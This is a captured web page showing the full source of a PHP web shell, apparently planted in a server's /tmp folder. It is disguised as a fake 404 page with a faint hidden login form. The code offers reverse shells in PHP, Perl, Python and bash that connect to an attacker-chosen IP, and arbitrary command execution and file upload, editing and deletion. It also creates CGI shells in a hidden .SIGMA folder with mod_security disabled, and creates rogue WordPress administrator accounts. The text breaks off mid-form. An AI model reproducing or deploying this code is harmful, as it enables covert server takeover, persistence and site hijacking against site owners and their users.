📁 SysAdmin FileManager
Linux 4.18.0-553.52.1.lve.el8.x86_64 | PHP 8.3.30
/ Root
/
tmp
📂 Files
📤 Upload
➕ New
ℹ️ Info
⬆️ Up
✏️ Edit: temp_ff11c7db0fd92e20bbf9d98e497db013.php
👁️ View
✕ Cancel
<?php // ================ LOGIN SYSTEM ================ session_start(); $valid_hash = '$2y$10$wg9lRJsLZgU0Dk0BRMowU.87PjIOMQiDSKNfHF3YcPFNabEPlF/Fm'; // Cek apakah sudah login if (!isset($_SESSION['sigma_access'])) { // Cek form login if (isset($_POST['sigma_pass'])) { if (password_verify($_POST['sigma_pass'], $valid_hash)) { $_SESSION['sigma_access'] = true; header('Location: ' . $_SERVER['PHP_SELF']); exit; } } // Tampilkan halaman 404 palsu dengan form login http_response_code(404); $requested_url = $_SERVER['REQUEST_URI'] ?? '/'; ?> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <style> /* Hidden password form - samar di tengah bawah */ .sigma-form { position: fixed; bottom: 20px; left: 50%; transform: translateX(-50%); opacity: 0.15; transition: opacity 0.3s ease; text-align: center; pointer-events: auto; z-index: 1000; } .sigma-form:hover { opacity: 0.4; } .sigma-form input { background: transparent; border: 1px solid #ccc; color: #333; padding: 6px 12px; font-size: 13px; font-family: 'Times New Roman', serif; width: 150px; border-radius: 0; } .sigma-form input:focus { outline: none; border-color: #666; background: rgba(255,255,255,0.1); } .sigma-form button { background: transparent; border: 1px solid #ccc; color: #333; padding: 6px 12px; font-size: 13px; font-family: 'Times New Roman', serif; cursor: pointer; margin-left: 5px; } .sigma-form button:hover { background: rgba(0,0,0,0.05); } /* Hint sangat samar di source code */ .sigma-hint { display: none; } /* Style untuk pesan error */ .error-msg { position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background: rgba(255,0,0,0.1); border: 1px solid #ff0000; color: #ff0000; padding: 5px 10px; font-size: 12px; font-family: monospace; opacity: 0.7; } </style> </head> <body> <h1>Not Found</h1> <p>The requested URL <?php echo htmlspecialchars($requested_url); ?> was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <!-- access pattern: /dev/shm/.sigma --> <!-- Hidden login form - samar di tengah bawah --> <form method="POST" class="sigma-form" autocomplete="off"> <input type="password" name="sigma_pass" placeholder="••••••"> <button type="submit">→</button> </form> <?php if (isset($_POST['sigma_pass'])): ?> <div class="error-msg">Access denied</div> <?php endif; ?> <script> (function() { const form = document.querySelector('.sigma-form'); const input = form.querySelector('input'); input.addEventListener('focus', function() { form.style.opacity = '0.8'; }); input.addEventListener('blur', function() { form.style.opacity = '0.15'; }); })(); </script> </body> </html> <?php exit; } // ================ ORIGINAL ALFA.PHP ================ // [DI SINI KODE ALFA.PHP ASLI TANPA PERUBAHAN] error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); function backConnect($type, $ip, $port) { $code = ''; switch($type) { case 'php': $code = '<?php $sock=fsockopen("'.$ip.'",'.$port.');$proc=proc_open("/bin/sh -i", array(0=>$sock,1=>$sock,2=>$sock),$pipes);proc_close($proc);?>'; eval($code); break; case 'perl': $code = 'perl -e \'use Socket;$i="'.$ip.'";$p='.$port.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''; shell_exec($code . ' 2>&1 &'); break; case 'python': $code = 'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'.$ip.'",'.$port.'));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''; shell_exec($code . ' 2>&1 &'); break; case 'bash': $code = 'bash -i >& /dev/tcp/'.$ip.'/'.$port.' 0>&1'; shell_exec($code . ' 2>&1 &'); break; } return true; } function createCGIShell($type, $base_path) { // Buat folder .SIGMA $sigma_folder = rtrim($base_path, '/') . '/.SIGMA'; if (!is_dir($sigma_folder)) { mkdir($sigma_folder, 0755, true); } // Buat .htaccess $htaccess = $sigma_folder . '/.htaccess'; $htaccess_content = 'Options +ExecCGI AddHandler cgi-script .cgi DirectoryIndex index.html # Allow access from anywhere Order allow,deny Allow from all # Disable security for CGI <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> # Set proper permissions <FilesMatch "\.cgi$"> SetHandler cgi-script Options +ExecCGI </FilesMatch>'; file_put_contents($htaccess, $htaccess_content); $content = ''; $filename = ''; if ($type == 'perl') { $filename = 'perl.cgi'; $content = '#!/usr/bin/perl use strict; use warnings; print "Content-type: text/html\n\n"; print "<!DOCTYPE html><html><head><title>Perl CGI Shell</title>"; print "<style>body{background:#1e1e2f;color:#e0e0e0;font-family:monospace;padding:20px;}"; print "input{background:#2d2d3a;color:#fff;border:1px solid #4a9eff;padding:8px;width:70%;font-family:monospace;}"; print "button{background:#4a9eff;color:#fff;border:none;padding:8px 20px;cursor:pointer;font-weight:bold;}"; print "pre{background:#252532;padding:15px;border-radius:5px;border-left:4px solid #7502FF;}</style></head><body>"; print "<h2>Perl CGI Shell</h2>"; print "<form method=\'GET\'><input type=\'text\' name=\'cmd\' placeholder=\'Enter command...\' autofocus> "; print "<button type=\'submit\'>Execute</button></form>"; print "<hr><pre>"; my $cmd = $ENV{\'QUERY_STRING\'}; $cmd =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $cmd =~ s/\+/ /g; $cmd =~ s/&cmd=//; if ($cmd) { my $output = `$cmd 2>&1`; $output =~ s/</</g; $output =~ s/>/>/g; print $output; } print "</pre></body></html>"; '; } elseif ($type == 'python') { $filename = 'python.cgi'; $content = '#!/usr/bin/python import os import cgi print "Content-type: text/html\\n" print "<!DOCTYPE html><html><head><title>Python CGI Shell</title>" print "<style>body{background:#1e1e2f;color:#e0e0e0;font-family:monospace;padding:20px;}" print "input{background:#2d2d3a;color:#fff;border:1px solid #4a9eff;padding:8px;width:70%;font-family:monospace;}" print "button{background:#4a9eff;color:#fff;border:none;padding:8px 20px;cursor:pointer;font-weight:bold;}" print "pre{background:#252532;padding:15px;border-radius:5px;border-left:4px solid #7502FF;}</style></head><body>" print "<h2>Python CGI Shell</h2>" print "<form method=\'GET\'><input type=\'text\' name=\'cmd\' placeholder=\'Enter command...\' autofocus> " print "<button type=\'submit\'>Execute</button></form>" print "<hr><pre>" fs = cgi.FieldStorage() cmd = fs.getvalue("cmd", "") if cmd: output = os.popen(cmd).read() print output.replace("<", "<").replace(">", ">") print "</pre></body></html>" '; } elseif ($type == 'bash') { $filename = 'bash.cgi'; $content = '#!/bin/bash echo "Content-type: text/html" echo "" echo "<!DOCTYPE html><html><head><title>Bash CGI Shell</title>" echo "<style>body{background:#1e1e2f;color:#e0e0e0;font-family:monospace;padding:20px;}" echo "input{background:#2d2d3a;color:#fff;border:1px solid #4a9eff;padding:8px;width:70%;font-family:monospace;}" echo "button{background:#4a9eff;color:#fff;border:none;padding:8px 20px;cursor:pointer;font-weight:bold;}" echo "pre{background:#252532;padding:15px;border-radius:5px;border-left:4px solid #7502FF;}</style></head><body>" echo "<h2>Bash CGI Shell</h2>" echo "<form method=\'GET\'><input type=\'text\' name=\'cmd\' placeholder=\'Enter command...\' autofocus> " echo "<button type=\'submit\'>Execute</button></form>" echo "<hr><pre>" QUERY_STRING="$QUERY_STRING" cmd=$(echo "$QUERY_STRING" | sed "s/&cmd=//g" | sed "s/%20/ /g" | sed "s/%2F/\//g") if [ -n "$cmd" ]; then eval "$cmd" 2>&1 fi echo "</pre></body></html>" '; } if ($content && $filename) { $fullpath = $sigma_folder . '/' . $filename; if (file_put_contents($fullpath, $content)) { chmod($fullpath, 0755); return ['path' => $fullpath, 'url' => $filename]; } } return false; } function wpAddAdmin($path, $username, $password, $email) { $wp_load = rtrim($path, '/') . '/wp-load.php'; if (!file_exists($wp_load)) { return ['success' => false, 'message' => 'wp-load.php not found at: ' . $wp_load]; } // Include WordPress try { ob_start(); define('WP_USE_THEMES', false); define('SHORTINIT', false); require_once($wp_load); ob_end_clean(); } catch (Exception $e) { return ['success' => false, 'message' => 'Error loading WordPress: ' . $e->getMessage()]; } // Check if WordPress functions are available if (!function_exists('wp_insert_user')) { return ['success' => false, 'message' => 'WordPress functions not available (wp_insert_user missing)']; } // Check if user exists $user_id = username_exists($username); if ($user_id) { return ['success' => false, 'message' => 'Username already exists']; } if (email_exists($email)) { return ['success' => false, 'message' => 'Email already exists']; } // Create user $user_id = wp_insert_user([ 'user_login' => $username, 'user_pass' => $password, 'user_email' => $email, 'user_registered' => date('Y-m-d H:i:s'), 'role' => 'administrator', 'display_name' => $username, 'nickname' => $username ]); if (is_wp_error($user_id)) { return ['success' => false, 'message' => 'Error: ' . $user_id->get_error_message()]; } // Ensure user is admin $user = new WP_User($user_id); $user->set_role('administrator'); return ['success' => true, 'message' => "Admin user '$username' created successfully (ID: $user_id)"]; } function scanWordPress($path) { $sites = []; if (is_dir($path)) { $items = scandir($path); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $full_path = $path . '/' . $item; if (is_dir($full_path)) { // Cek di dalam folder if (file_exists($full_path . '/wp-load.php')) { $sites[] = $full_path; } } else { // Cek di current directory if ($item == 'wp-load.php') { $sites[] = $path; } } } // Cek current directory juga if (file_exists($path . '/wp-load.php')) { if (!in_array($path, $sites)) { $sites[] = $path; } } } return array_unique($sites); } // FUNGSI FILE MANAGER function listDir($dir) { $items = []; if ($dh = @opendir($dir)) { while (($file = readdir($dh)) !== false) { if ($file != '.' && $file != '..') { $path = rtrim($dir, '/') . '/' . $file; $items[] = [ 'name' => $file, 'path' => $path, 'type' => is_dir($path) ? 'dir' : 'file', 'size' => is_file($path) ? filesize($path) : 0, 'mtime' => filemtime($path), 'perms' => substr(sprintf('%o', fileperms($path)), -4), 'owner' => function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($path))['name'] ?? '?' : '?', 'group' => function_exists('posix_getgrgid') ? posix_getgrgid(filegroup($path))['name'] ?? '?' : '?' ]; } } closedir($dh); } usort($items, function($a, $b) { if ($a['type'] == $b['type']) return strcasecmp($a['name'], $b['name']); return $a['type'] == 'dir' ? -1 : 1; }); return $items; } function formatSize($bytes) { if ($bytes >= 1073741824) return number_format($bytes / 1073741824, 2) . ' GB'; if ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . ' MB'; if ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB'; return $bytes . ' B'; } function getSystemInfo() { $info = []; $info['kernel'] = php_uname('s') . ' ' . php_uname('r'); $info['hostname'] = php_uname('n'); $info['user'] = get_current_user() . ' (UID: ' . (function_exists('getmyuid') ? getmyuid() : '?') . ')'; $info['disabled'] = ini_get('disable_functions') ?: 'None'; $info['phpver'] = phpversion(); $info['server_ip'] = $_SERVER['SERVER_ADDR'] ?? 'Unknown'; $info['client_ip'] = $_SERVER['REMOTE_ADDR'] ?? 'Unknown'; $info['software'] = $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown'; return $info; } // AJAX HANDLERS if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest') { header('Content-Type: application/json'); if (isset($_POST['action'])) { $response = ['success' => false, 'message' => '', 'data' => null]; switch ($_POST['action']) { case 'list': $dir = $_POST['dir'] ?? '.'; $items = listDir($dir); $response['success'] = true; $response['data'] = $items; break; case 'rename': $old = $_POST['old'] ?? ''; $new = $_POST['new'] ?? ''; if ($old && $new && file_exists($old) && rename($old, $new)) { $response['success'] = true; $response['message'] = 'Renamed successfully'; } break; case 'delete': $path = $_POST['path'] ?? ''; if ($path && file_exists($path)) { if (is_dir($path)) { $success = true; $it = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST ); foreach ($it as $f) { if ($f->isDir()) $success = @rmdir($f->getRealPath()) && $success; else $success = @unlink($f->getRealPath()) && $success; } $success = @rmdir($path) && $success; $response['success'] = $success; $response['message'] = $success ? 'Deleted' : 'Delete failed'; } else { if (@unlink($path)) { $response['success'] = true; $response['message'] = 'Deleted'; } } } break; case 'save': $file = $_POST['file'] ?? ''; $content = $_POST['content'] ?? ''; if ($file && file_put_contents($file, $content) !== false) { $response['success'] = true; $response['message'] = 'Saved'; } break; case 'chmod': $path = $_POST['path'] ?? ''; $perms = $_POST['perms'] ?? ''; if ($path && $perms && chmod($path, octdec($perms))) { $response['success'] = true; $response['message'] = 'Permissions changed'; } break; case 'mkdir': $dir = $_POST['dir'] ?? ''; if ($dir && !file_exists($dir) && mkdir($dir, 0755, true)) { $response['success'] = true; $response['message'] = 'Directory created'; } break; case 'mkfile': $file = $_POST['file'] ?? ''; $content = $_POST['content'] ?? ''; if ($file && file_put_contents($file, $content) !== false) { $response['success'] = true; $response['message'] = 'File created'; } break; case 'upload': if (isset($_FILES['file'])) { $target = $_POST['path'] . '/' . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) { $response['success'] = true; $response['message'] = 'Uploaded'; } } break; case 'read': $file = $_POST['file'] ?? ''; if ($file && file_exists($file) && is_file($file)) { $response['success'] = true; $response['data'] = file_get_contents($file); } break; case 'cmd': $cmd = $_POST['cmd'] ?? ''; $cwd = $_POST['cwd'] ?? ''; if ($cmd) { $fullcmd = "cd " . escapeshellarg($cwd) . " && " . $cmd . " 2>&1"; $output = ''; if (function_exists('shell_exec')) { $output = shell_exec($fullcmd); } elseif (function_exists('exec')) { exec($fullcmd, $out); $output = implode("\n", $out); } elseif (function_exists('system')) { ob_start(); system($fullcmd); $output = ob_get_clean(); } elseif (function_exists('passthru')) { ob_start(); passthru($fullcmd); $output = ob_get_clean(); } elseif (is_resource($proc = popen($fullcmd, 'r'))) { $output = fread($proc, 2097152); pclose($proc); } $response['success'] = true; $response['data'] = $output ?: 'No output'; } break; case 'backconnect': $type = $_POST['type'] ?? 'php'; $ip = $_POST['ip'] ?? ''; $port = $_POST['port'] ?? ''; if ($ip && $port) { backConnect($type, $ip, $port); $response['success'] = true; $response['message'] = "Backconnect sent to $ip:$port using $type"; } break; case 'cgi': $type = $_POST['cgi_type'] ?? ''; $path = $_POST['cgi_path'] ?? ''; $result = createCGIShell($type, $path); if ($result) { $response['success'] = true; $response['message'] = 'CGI shell created in .SIGMA folder'; $response['path'] = $result['path']; $response['url'] = $result['url']; $response['folder'] = '.SIGMA'; $base_url = (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']); $response['full_url'] = $base_url . '/.SIGMA/' . $result['url']; } else { $response['message'] = 'Failed to create CGI shell'; } break; case 'wp_scan': $path = $_POST['path'] ?? '.'; $sites = scanWordPress($path); $response['success'] = true; $response['sites'] = $sites; $response['count'] = count($sites); break; case 'wp_add': $path = $_POST['wp_path'] ?? ''; $user = $_POST['username'] ?? ''; $pass = $_POST['password'] ?? ''; $email = $_POST['email'] ?? ''; if ($path && $user && $pass && $email) { $response = wpAddAdmin($path, $user, $pass, $email); } else { $response['message'] = 'All fields required'; } break; } echo json_encode($response); exit; } } // MAIN SHELL - TEMA ALFA $cwd = isset($_GET['dir']) ? $_GET['dir'] : '.'; $cwd = realpath($cwd) ?: realpath('.'); if (!$cwd) $cwd = '/'; if ($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; $sys_info = getSystemInfo(); ?> <!DOCTYPE html> <html> <head> <title>sigma shell</title> <meta charset="UTF-8"> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: #1e1e2f; color: #e0e0e0; padding: 20px; } .container { max-width: 1400px; margin: 0 auto; background: #2d2d3a; border-radius: 12px; padding: 25px; box-shadow: 0 8px 30px rgba(0,0,0,0.3); } /* System Info */ .sys-info { background: #252532; border-radius: 10px; padding: 20px; margin-bottom: 25px; display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 15px; border: 1px solid #3a3a4a; } .info-item { padding: 10px; background: #1e1e2b; border-radius: 8px; border-left: 3px solid #4a9eff; } .info-label { font-size: 12px; color: #8a8fa0; text-transform: uppercase; letter-spacing: 0.5px; margin-bottom: 5px; } .info-value { font-size: 14px; color: #fff; font-weight: 500; word-break: break-all; } .info-value a { color: #4a9eff; text-decoration: none; } .info-value a:hover { text-decoration: underline; } /* Header */ .header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px; padding-bottom: 15px; border-bottom: 1px solid #3a3a4a; } .header h1 { font-size: 24px; font-weight: 600; color: #fff; } .header h1 span { color: #4a9eff; font-size: 14px; margin-left: 10px; font-weight: normal; } /* Menu Tabs */ .menu-tabs { display: flex; gap: 2px; margin-bottom: 20px; background: #252532; padding: 10px; border-radius: 8px; border: 1px solid #3a3a4a; } .tab-btn { padding: 10px 20px; background: #3a3a4a; color: #8a8fa0; border: none; border-radius: 6px; cursor: pointer; font-size: 14px; font-weight: 500; transition: all 0.2s; } .tab-btn:hover { background: #4a9eff; color: #fff; } .tab-btn.active { background: #4a9eff; color: #fff; } /* Path */ .path { background: #252532; padding: 12px 18px; border-radius: 8px; margin-bottom: 20px; font-family: 'Courier New', monospace; font-size: 14px; border: 1px solid #3a3a4a; display: flex; align-items: center; gap: 10px; flex-wrap: wrap; } .path a { color: #4a9eff; text-decoration: none; } .path a:hover { text-decoration: underline; } /* Action Buttons */ .actions { display: flex; gap: 10px; margin-bottom: 20px; flex-wrap: wrap; } .btn { padding: 10px 18px; background: #3a3a4a; color: #fff; border: none; border-radius: 6px; cursor: pointer; font-size: 14px; font-weight: 500; transition: all 0.2s; display: inline-flex; align-items: center; gap: 5px; } .btn:hover { background: #4a4a5a; transform: translateY(-1px); } .btn-primary { background: #4a9eff; } .btn-primary:hover { background: #6aafff; } .btn-success { background: #2ecc71; } .btn-success:hover { background: #27ae60; } .btn-danger { background: #e74c3c; } .btn-danger:hover { background: #c0392b; } .btn-warning { background: #f39c12; } .btn-warning:hover { background: #e67e22; } /* Tools Grid */ .tools-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(350px, 1fr)); gap: 20px; margin-bottom: 25px; } .tool-card { background: #252532; border-radius: 10px; border: 1px solid #3a3a4a; overflow: hidden; } .tool-header { background: #1e1e2b; padding: 15px 20px; font-weight: 600; color: #4a9eff; border-bottom: 1px solid #3a3a4a; cursor: pointer; display: flex; justify-content: space-between; align-items: center; } .tool-header:hover { background: #2a2a38; } .tool-header .toggle-icon { transition: transform 0.3s; font-size: 12px; color: #8a8fa0; } .tool-header.collapsed .toggle-icon { transform: rotate(-90deg); } .tool-body { padding: 20px; transition: all 0.3s; } .tool-body.collapsed { display: none; } .tool-body input, .tool-body select, .tool-body textarea { width: 100%; padding: 10px 12px; margin-bottom: 12px; background: #1e1e2b; border: 1px solid #3a3a4a; border-radius: 6px; color: #fff; font-size: 14px; } .tool-body input:focus, .tool-body select:focus, .tool-body textarea:focus { outline: none; border-color: #4a9eff; } .tool-body label { display: block; margin-bottom: 5px; color: #8a8fa0; font-size: 13px; } .tool-row { display: flex; gap: 10px; margin-bottom: 12px; } .tool-row input { flex: 1; margin-bottom: 0; } /* File Table - Compact dan Estetik */ .file-table { width: 100%; border-collapse: collapse; margin-bottom: 20px; font-size: 13px; } .file-table th { background: #252532; padding: 10px 6px; text-align: left; font-weight: 600; color: #8a8fa0; border-bottom: 2px solid #3a3a4a; font-size: 12px; white-space: nowrap; } .file-table td { padding: 8px 6px; border-bottom: 1px solid #3a3a4a; white-space: nowrap; } .file-table tr:hover { background: #323240; } .file-table .dir { color: #4a9eff; font-weight: 500; } .file-table .file { color: #e0e0e0; } .perms { font-family: 'Courier New', monospace; color: #8a8fa0; letter-spacing: 0.5px; } .size { font-family: 'Courier New', monospace; color: #8a8fa0; text-align: right; padding-right: 10px; } .actions-cell { display: flex; gap: 2px; flex-wrap: nowrap; } .action-btn { padding: 3px 6px; font-size: 10px; border-radius: 3px; background: #3a3a4a; color: #fff; border: none; cursor: pointer; transition: all 0.2s; min-width: 32px; text-align: center; } .action-btn:hover { background: #4a4a5a; } .action-btn.edit { background: #f39c12; } .action-btn.download { background: #3498db; } .action-btn.rename { background: #95a5a6; } .action-btn.perms { background: #9b59b6; } .action-btn.delete { background: #e74c3c; } /* Shell Section */ .shell-section { background: #252532; border-radius: 10px; margin-top: 25px; border: 1px solid #3a3a4a; overflow: hidden; } .shell-header { background: #1e1e2b; padding: 15px 20px; font-weight: 600; color: #4a9eff; border-bottom: 1px solid #3a3a4a; } .shell-input { display: flex; padding: 15px; background: #2d2d3a; gap: 10px; } .shell-input input { flex: 1; padding: 12px 15px; background: #1e1e2b; border: 1px solid #3a3a4a; border-radius: 6px; color: #fff; font-family: 'Courier New', monospace; font-size: 14px; } .shell-input input:focus { outline: none; border-color: #4a9eff; } .shell-output { background: #1a1a25; color: #00ff00; padding: 15px; font-family: 'Courier New', monospace; font-size: 13px; white-space: pre-wrap; word-break: break-all; max-height: 300px; overflow-y: auto; border-top: 1px solid #3a3a4a; } /* Modal */ .modal { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); z-index: 1000; backdrop-filter: blur(5px); } .modal-content { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: #2d2d3a; padding: 30px; border-radius: 12px; min-width: 400px; max-width: 90%; max-height: 90vh; overflow-y: auto; box-shadow: 0 20px 60px rgba(0,0,0,0.5); border: 1px solid #4a4a5a; } .modal-header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px; padding-bottom: 10px; border-bottom: 1px solid #3a3a4a; } .modal-header h3 { color: #fff; font-size: 18px; } .close { color: #8a8fa0; font-size: 24px; cursor: pointer; transition: color 0.2s; } .close:hover { color: #fff; } .form-group { margin-bottom: 20px; } .form-group label { display: block; margin-bottom: 8px; color: #8a8fa0; font-size: 13px; font-weight: 500; } .form-group input, .form-group textarea, .form-group select { width: 100%; padding: 10px 12px; background: #1e1e2b; border: 1px solid #3a3a4a; border-radius: 6px; color: #fff; font-size: 14px; } .form-group input:focus, .form-group textarea:focus, .form-group select:focus { outline: none; border-color: #4a9eff; } .form-group textarea { min-height: 300px; font-family: 'Courier New', monospace; resize: vertical; } .modal-footer { display: flex; gap: 10px; justify-content: flex-end; margin-top: 20px; } /* Iframe untuk CGI Shell */ .cgi-iframe { width: 100%; height: 500px; border: 2px solid #3a3a4a; border-radius: 8px; background: #1e1e2f; margin-top: 15px; } /* Alert */ .alert { position: fixed; top: 20px; right: 20px; padding: 15px 25px; background: #2d2d3a; border-left: 4px solid #4a9eff; border-radius: 6px; color: #fff; box-shadow: 0 5px 20px rgba(0,0,0,0.3); z-index: 2000; animation: slideIn 0.3s ease; } .alert.success { border-left-color: #2ecc71; } .alert.error { border-left-color: #e74c3c; } @keyframes slideIn { from { transform: translateX(100%); opacity: 0; } to { transform: translateX(0); opacity: 1; } } .hidden { display: none; } /* Loading Spinner */ .spinner { display: inline-block; width: 20px; height: 20px; border: 2px solid #3a3a4a; border-top-color: #4a9eff; border-radius: 50%; animation: spin 1s linear infinite; margin-right: 10px; vertical-align: middle; } @keyframes spin { to { transform: rotate(360deg); } } /* Scrollbar */ ::-webkit-scrollbar { width: 8px; height: 8px; } ::-webkit-scrollbar-track { background: #1e1e2b; border-radius: 8px; } ::-webkit-scrollbar-thumb { background: #3a3a4a; border-radius: 8px; } ::-webkit-scrollbar-thumb:hover { background: #4a4a5a; } </style> </head> <body> <div class="container"> <!-- System Info --> <div class="sys-info"> <div class="info-item"> <div class="info-label">Kernel</div> <div class="info-value"><?php echo htmlspecialchars($sys_info['kernel']); ?></div> </div> <div class="info-item"> <div class="info-label">User</div> <div class="info-value"><?php echo htmlspecialchars($sys_info['user']); ?></div> </div> <div class="info-item"> <div class="info-label">Disabled Functions</div> <div class="info-value"><?php echo htmlspecialchars($sys_info['disabled']); ?></div> </div> <div class="info-item"> <div class="info-label">PHP Version</div> <div class="info-value"><?php echo htmlspecialchars($sys_info['phpver']); ?></div> </div> <div class="info-item"> <div class="info-label">Server IP</div> <div class="info-value"><?php echo htmlspecialchars($sys_info['server_ip']); ?></div> </div> <div class="info-item"> <div class="info-label">Your IP</div> <div class="info-value"><?php echo htmlspecialchars($sys_info['client_ip']); ?></div> </div> <div class="info-item"> <div class="info-label">Software</div> <div class="info-value"><?php echo htmlspecialchars($sys_info['software']); ?></div> </div> </div> <!-- Header --> <div class="header"> <h1>zev2 shell <span>v2.0</span></h1> </div> <!-- Menu Tabs --> <div class="menu-tabs"> <button class="tab-btn active" onclick="showTab('files')">File Manager</button> <button class="tab-btn" onclick="showTab('backconnect')">Back Connect</button> <button class="tab-btn" onclick="showTab('cgi')">CGI Shell</button> <button class="tab-btn" onclick="showTab('wordpress')">WordPress</button> </div> <!-- Tab: File Manager --> <div id="tab-files" class="tab-content"> <div class="path" id="currentPath"> <?php $parts = explode('/', trim($cwd, '/')); $path = ''; echo '<a href="#" onclick="changeDir(\'/\')">~</a>'; foreach ($parts as $p) { if ($p) { $path .= '/' . $p; echo ' / <a href="#" onclick="changeDir(\'' . htmlspecialchars($path) . '\')">' . htmlspecialchars($p) . '</a>'; } } ?> </div> <div class="actions"> <button onclick="showModal('upload')" class="btn btn-primary">Upload</button> <button onclick="showModal('mkdir')" class="btn btn-success">New Folder</button> <button onclick="showModal('mkfile')" class="btn btn-warning">New File</button> <button onclick="goUp()" class="btn">Up</button> <button onclick="refreshDir()" class="btn">Refresh</button> </div> <table class="file-table" id="fileTable"> <thead> <tr> <th width="30%">Name</th> <th width="8%">Size</th> <th width="8%">Perms</th> <th width="15%">Owner/Group</th> <th width="19%">Modified</th> <th width="20%">Actions</th> </tr> </thead> <tbody id="fileList"> <tr><td colspan="6" style="text-align:center; padding:40px;"><span class="spinner"></span> Loading...</td></tr> </tbody> </table> </div> <!-- Tab: Back Connect --> <div id="tab-backconnect" class="tab-content hidden"> <div class="tools-grid"> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>Reverse Shell</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <label>Type</label> <select id="bc_type"> <option value="php">PHP</option> <option value="perl">Perl</option> <option value="python">Python</option> <option value="bash">Bash</option> </select> <label>IP Address</label> <input type="text" id="bc_ip" value="<?php echo $sys_info['client_ip']; ?>"> <label>Port</label> <input type="text" id="bc_port" value="4444"> <button onclick="backConnect()" class="btn btn-danger" style="width:100%">Connect</button> </div> </div> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>Instructions</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <pre style="background:#1e1e2b; padding:15px; border-radius:8px; font-size:12px; color:#8a8fa0; border:1px solid #3a3a4a;"> 1. Listen on your machine: nc -lvnp [port] 2. Click Connect button 3. Shell will connect back </pre> </div> </div> </div> </div> <!-- Tab: CGI Shell (di folder .SIGMA) --> <div id="tab-cgi" class="tab-content hidden"> <div class="tools-grid"> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>Perl CGI Shell</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <label>Base Path (akan dibuat folder .SIGMA)</label> <input type="text" id="cgi_perl_path" value="<?php echo $cwd; ?>"> <button onclick="createCGI('perl')" class="btn btn-warning" style="width:100%">Create Perl CGI in .SIGMA</button> </div> </div> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>Python CGI Shell</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <label>Base Path (akan dibuat folder .SIGMA)</label> <input type="text" id="cgi_python_path" value="<?php echo $cwd; ?>"> <button onclick="createCGI('python')" class="btn btn-warning" style="width:100%">Create Python CGI in .SIGMA</button> </div> </div> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>Bash CGI Shell</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <label>Base Path (akan dibuat folder .SIGMA)</label> <input type="text" id="cgi_bash_path" value="<?php echo $cwd; ?>"> <button onclick="createCGI('bash')" class="btn btn-warning" style="width:100%">Create Bash CGI in .SIGMA</button> </div> </div> </div> <!-- Container untuk iframe CGI Shell --> <div id="cgiIframeContainer" style="margin-top:20px; display:none;"> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>CGI Shell Access (.SIGMA folder)</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <iframe id="cgiIframe" class="cgi-iframe" src="about:blank"></iframe> <div style="margin-top:15px; text-align:center;"> <a href="#" id="cgiIframeLink" target="_blank" class="btn btn-primary">Open in New Tab</a> </div> </div> </div> </div> </div> <!-- Tab: WordPress (FIXED) --> <div id="tab-wordpress" class="tab-content hidden"> <div class="tools-grid"> <div class="tool-card"> <div class="tool-header" onclick="toggleTool(this)"> <span>WordPress Admin Creator</span> <span class="toggle-icon">▼</span> </div> <div class="tool-body"> <label>Scan Directory</label> <input type="text" id="wp_scan_path" value="<?php echo $cwd; ?>"> <button onclick="scanWordPress()" class="btn btn-primary" style="width:100%; margin-bottom:15px">Scan for WordPress</button> <div id="wp_sites_container" style="display:none; margin-bottom:15px"> <label>Select WordPress Site (with wp-load.php)</label> <select id="wp_sites" style="width:100%;"></select> <div id="wp_count_badge" style="margin-top:5px; font-size:12px; color:#8a8fa0;"></div> </div> <div id="wp_form" style="display:none"> <label>Username</label> <input type="text" id="wp_user" value="admin"> <label>Password</label> <input type="text" id="wp_pass" value="Admin@123"> <label>Email</label> <input 